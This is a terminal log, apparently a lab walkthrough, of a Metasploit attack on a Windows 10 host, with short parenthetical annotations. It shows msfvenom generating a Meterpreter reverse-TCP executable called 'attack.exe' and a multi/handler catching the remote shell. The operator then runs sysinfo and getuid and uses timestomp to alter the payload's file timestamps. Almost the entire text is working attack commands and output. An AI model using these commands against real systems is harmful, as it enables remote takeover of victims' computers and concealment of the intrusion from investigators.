root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe > /root/attack.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/attack.exe (the virus)
root@kali:~# service postgresql start
root@kali:~# msfconsole
msf > db_status
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.117 (the Kali Linux host)
msf exploit(handler) > set lport 1234
msf exploit(handler) > show options
msf exploit(handler) > exploit -h
msf exploit(handler) > exploit -j z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.117:1234
msf exploit(handler) > [*] Starting the payload handler...
(The handler is now listening.)
(Run attack.exe on the Windows host.)
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.1.94
[*] Meterpreter session 1 opened (192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500 (session 1 is created after attack.exe runs on the Windows host)
msf exploit(handler) > sessions -i
Active sessions
===============
  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter x86/win32  sh-270\sewells @ SH-270  192.168.1.117:1234 -> 192.168.1.94:58540 (192.168.1.94)
msf exploit(handler) > sessions -i 1 (1 is the session Id number)
meterpreter > pwd (logged in successfully)
C:\Users\sewells\Desktop
meterpreter > sysinfo
Computer : SH-270
OS : Windows 10 (Build 14393).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > getuid
Server username: sh-270\sewells
meterpreter > timestomp -h (modify *** time)
meterpreter > timestomp attack.exe -v
Modified : 2017-03-10 00:01:11 -0500
Accessed : 2017-03-10 00:03:26 -0500
Created : 2017-03-10 00:18:07 -0500
Entry Modified: 2017-03-10 00:18:07 -0500